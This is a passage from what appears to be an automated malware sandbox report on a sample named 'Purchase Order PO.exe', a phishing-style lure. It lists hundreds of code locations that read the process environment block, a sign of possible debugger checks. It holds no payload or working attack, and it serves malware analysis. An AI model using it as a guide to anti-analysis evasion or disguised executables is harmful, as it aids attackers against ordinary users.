                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC656A mov eax, dword ptr fs:[00000030h]2_2_01AC656A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC656A mov eax, dword ptr fs:[00000030h]2_2_01AC656A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC656A mov eax, dword ptr fs:[00000030h]2_2_01AC656A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98550 mov eax, dword ptr fs:[00000030h]2_2_01A98550
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98550 mov eax, dword ptr fs:[00000030h]2_2_01A98550
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1A4B0 mov eax, dword ptr fs:[00000030h]2_2_01B1A4B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A964AB mov eax, dword ptr fs:[00000030h]2_2_01A964AB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC44B0 mov ecx, dword ptr fs:[00000030h]2_2_01AC44B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A904E5 mov ecx, dword ptr fs:[00000030h]2_2_01A904E5
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E420 mov eax, dword ptr fs:[00000030h]2_2_01A8E420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E420 mov eax, dword ptr fs:[00000030h]2_2_01A8E420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E420 mov eax, dword ptr fs:[00000030h]2_2_01A8E420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8C427 mov eax, dword ptr fs:[00000030h]2_2_01A8C427
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16420 mov eax, dword ptr fs:[00000030h]2_2_01B16420
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8402 mov eax, dword ptr fs:[00000030h]2_2_01AC8402
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8402 mov eax, dword ptr fs:[00000030h]2_2_01AC8402
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8402 mov eax, dword ptr fs:[00000030h]2_2_01AC8402
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1C460 mov ecx, dword ptr fs:[00000030h]2_2_01B1C460
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABA470 mov eax, dword ptr fs:[00000030h]2_2_01ABA470
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABA470 mov eax, dword ptr fs:[00000030h]2_2_01ABA470
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABA470 mov eax, dword ptr fs:[00000030h]2_2_01ABA470
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE443 mov eax, dword ptr fs:[00000030h]2_2_01ACE443
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB245A mov eax, dword ptr fs:[00000030h]2_2_01AB245A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8645D mov eax, dword ptr fs:[00000030h]2_2_01A8645D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A907AF mov eax, dword ptr fs:[00000030h]2_2_01A907AF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3678E mov eax, dword ptr fs:[00000030h]2_2_01B3678E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB27ED mov eax, dword ptr fs:[00000030h]2_2_01AB27ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB27ED mov eax, dword ptr fs:[00000030h]2_2_01AB27ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB27ED mov eax, dword ptr fs:[00000030h]2_2_01AB27ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E7E1 mov eax, dword ptr fs:[00000030h]2_2_01B1E7E1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A947FB mov eax, dword ptr fs:[00000030h]2_2_01A947FB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A947FB mov eax, dword ptr fs:[00000030h]2_2_01A947FB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9C7C0 mov eax, dword ptr fs:[00000030h]2_2_01A9C7C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B107C3 mov eax, dword ptr fs:[00000030h]2_2_01B107C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0C730 mov eax, dword ptr fs:[00000030h]2_2_01B0C730
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC720 mov eax, dword ptr fs:[00000030h]2_2_01ACC720
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC720 mov eax, dword ptr fs:[00000030h]2_2_01ACC720
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC273C mov eax, dword ptr fs:[00000030h]2_2_01AC273C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC273C mov ecx, dword ptr fs:[00000030h]2_2_01AC273C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC273C mov eax, dword ptr fs:[00000030h]2_2_01AC273C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC700 mov eax, dword ptr fs:[00000030h]2_2_01ACC700
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90710 mov eax, dword ptr fs:[00000030h]2_2_01A90710
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC0710 mov eax, dword ptr fs:[00000030h]2_2_01AC0710
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98770 mov eax, dword ptr fs:[00000030h]2_2_01A98770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC674D mov esi, dword ptr fs:[00000030h]2_2_01AC674D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC674D mov eax, dword ptr fs:[00000030h]2_2_01AC674D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC674D mov eax, dword ptr fs:[00000030h]2_2_01AC674D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B14755 mov eax, dword ptr fs:[00000030h]2_2_01B14755
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E75D mov eax, dword ptr fs:[00000030h]2_2_01B1E75D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90750 mov eax, dword ptr fs:[00000030h]2_2_01A90750
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2750 mov eax, dword ptr fs:[00000030h]2_2_01AD2750
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2750 mov eax, dword ptr fs:[00000030h]2_2_01AD2750
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC6A6 mov eax, dword ptr fs:[00000030h]2_2_01ACC6A6
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC66B0 mov eax, dword ptr fs:[00000030h]2_2_01AC66B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94690 mov eax, dword ptr fs:[00000030h]2_2_01A94690
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94690 mov eax, dword ptr fs:[00000030h]2_2_01A94690
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B106F1 mov eax, dword ptr fs:[00000030h]2_2_01B106F1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B106F1 mov eax, dword ptr fs:[00000030h]2_2_01B106F1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA6C7 mov ebx, dword ptr fs:[00000030h]2_2_01ACA6C7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA6C7 mov eax, dword ptr fs:[00000030h]2_2_01ACA6C7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9262C mov eax, dword ptr fs:[00000030h]2_2_01A9262C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC6620 mov eax, dword ptr fs:[00000030h]2_2_01AC6620
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8620 mov eax, dword ptr fs:[00000030h]2_2_01AC8620
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE627 mov eax, dword ptr fs:[00000030h]2_2_01AAE627
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2619 mov eax, dword ptr fs:[00000030h]2_2_01AD2619
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E609 mov eax, dword ptr fs:[00000030h]2_2_01B0E609
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA660 mov eax, dword ptr fs:[00000030h]2_2_01ACA660
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA660 mov eax, dword ptr fs:[00000030h]2_2_01ACA660
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC2674 mov eax, dword ptr fs:[00000030h]2_2_01AC2674
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5866E mov eax, dword ptr fs:[00000030h]2_2_01B5866E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5866E mov eax, dword ptr fs:[00000030h]2_2_01B5866E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAC640 mov eax, dword ptr fs:[00000030h]2_2_01AAC640
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B189B3 mov esi, dword ptr fs:[00000030h]2_2_01B189B3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B189B3 mov eax, dword ptr fs:[00000030h]2_2_01B189B3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B189B3 mov eax, dword ptr fs:[00000030h]2_2_01B189B3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A909AD mov eax, dword ptr fs:[00000030h]2_2_01A909AD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A909AD mov eax, dword ptr fs:[00000030h]2_2_01A909AD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E9E0 mov eax, dword ptr fs:[00000030h]2_2_01B1E9E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC29F9 mov eax, dword ptr fs:[00000030h]2_2_01AC29F9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC29F9 mov eax, dword ptr fs:[00000030h]2_2_01AC29F9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5A9D3 mov eax, dword ptr fs:[00000030h]2_2_01B5A9D3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B269C0 mov eax, dword ptr fs:[00000030h]2_2_01B269C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A9D0 mov eax, dword ptr fs:[00000030h]2_2_01A9A9D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A9D0 mov eax, dword ptr fs:[00000030h]2_2_01A9A9D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A9D0 mov eax, dword ptr fs:[00000030h]2_2_01A9A9D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A9D0 mov eax, dword ptr fs:[00000030h]2_2_01A9A9D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A9D0 mov eax, dword ptr fs:[00000030h]2_2_01A9A9D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A9D0 mov eax, dword ptr fs:[00000030h]2_2_01A9A9D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC49D0 mov eax, dword ptr fs:[00000030h]2_2_01AC49D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B2892B mov eax, dword ptr fs:[00000030h]2_2_01B2892B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1892A mov eax, dword ptr fs:[00000030h]2_2_01B1892A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1C912 mov eax, dword ptr fs:[00000030h]2_2_01B1C912
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A88918 mov eax, dword ptr fs:[00000030h]2_2_01A88918
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A88918 mov eax, dword ptr fs:[00000030h]2_2_01A88918
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E908 mov eax, dword ptr fs:[00000030h]2_2_01B0E908
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E908 mov eax, dword ptr fs:[00000030h]2_2_01B0E908
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD096E mov eax, dword ptr fs:[00000030h]2_2_01AD096E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD096E mov edx, dword ptr fs:[00000030h]2_2_01AD096E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD096E mov eax, dword ptr fs:[00000030h]2_2_01AD096E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB6962 mov eax, dword ptr fs:[00000030h]2_2_01AB6962
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB6962 mov eax, dword ptr fs:[00000030h]2_2_01AB6962
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB6962 mov eax, dword ptr fs:[00000030h]2_2_01AB6962
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B34978 mov eax, dword ptr fs:[00000030h]2_2_01B34978
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B34978 mov eax, dword ptr fs:[00000030h]2_2_01B34978
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1C97C mov eax, dword ptr fs:[00000030h]2_2_01B1C97C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B10946 mov eax, dword ptr fs:[00000030h]2_2_01B10946
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1C89D mov eax, dword ptr fs:[00000030h]2_2_01B1C89D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90887 mov eax, dword ptr fs:[00000030h]2_2_01A90887
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5A8E4 mov eax, dword ptr fs:[00000030h]2_2_01B5A8E4
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC8F9 mov eax, dword ptr fs:[00000030h]2_2_01ACC8F9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC8F9 mov eax, dword ptr fs:[00000030h]2_2_01ACC8F9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE8C0 mov eax, dword ptr fs:[00000030h]2_2_01ABE8C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3483A mov eax, dword ptr fs:[00000030h]2_2_01B3483A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3483A mov eax, dword ptr fs:[00000030h]2_2_01B3483A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA830 mov eax, dword ptr fs:[00000030h]2_2_01ACA830
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB2835 mov eax, dword ptr fs:[00000030h]2_2_01AB2835
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB2835 mov eax, dword ptr fs:[00000030h]2_2_01AB2835
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB2835 mov eax, dword ptr fs:[00000030h]2_2_01AB2835
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB2835 mov ecx, dword ptr fs:[00000030h]2_2_01AB2835
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB2835 mov eax, dword ptr fs:[00000030h]2_2_01AB2835
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB2835 mov eax, dword ptr fs:[00000030h]2_2_01AB2835
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1C810 mov eax, dword ptr fs:[00000030h]2_2_01B1C810
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B26870 mov eax, dword ptr fs:[00000030h]2_2_01B26870
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B26870 mov eax, dword ptr fs:[00000030h]2_2_01B26870
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E872 mov eax, dword ptr fs:[00000030h]2_2_01B1E872
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E872 mov eax, dword ptr fs:[00000030h]2_2_01B1E872
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA2840 mov ecx, dword ptr fs:[00000030h]2_2_01AA2840
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94859 mov eax, dword ptr fs:[00000030h]2_2_01A94859
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94859 mov eax, dword ptr fs:[00000030h]2_2_01A94859
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC0854 mov eax, dword ptr fs:[00000030h]2_2_01AC0854
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0BBE mov eax, dword ptr fs:[00000030h]2_2_01AA0BBE
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0BBE mov eax, dword ptr fs:[00000030h]2_2_01AA0BBE
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1CBF0 mov eax, dword ptr fs:[00000030h]2_2_01B1CBF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABEBFC mov eax, dword ptr fs:[00000030h]2_2_01ABEBFC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98BF0 mov eax, dword ptr fs:[00000030h]2_2_01A98BF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98BF0 mov eax, dword ptr fs:[00000030h]2_2_01A98BF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98BF0 mov eax, dword ptr fs:[00000030h]2_2_01A98BF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB0BCB mov eax, dword ptr fs:[00000030h]2_2_01AB0BCB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB0BCB mov eax, dword ptr fs:[00000030h]2_2_01AB0BCB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB0BCB mov eax, dword ptr fs:[00000030h]2_2_01AB0BCB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3EBD0 mov eax, dword ptr fs:[00000030h]2_2_01B3EBD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90BCD mov eax, dword ptr fs:[00000030h]2_2_01A90BCD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90BCD mov eax, dword ptr fs:[00000030h]2_2_01A90BCD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90BCD mov eax, dword ptr fs:[00000030h]2_2_01A90BCD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABEB20 mov eax, dword ptr fs:[00000030h]2_2_01ABEB20
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABEB20 mov eax, dword ptr fs:[00000030h]2_2_01ABEB20
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B58B28 mov eax, dword ptr fs:[00000030h]2_2_01B58B28
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B58B28 mov eax, dword ptr fs:[00000030h]2_2_01B58B28
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0EB1D mov eax, dword ptr fs:[00000030h]2_2_01B0EB1D
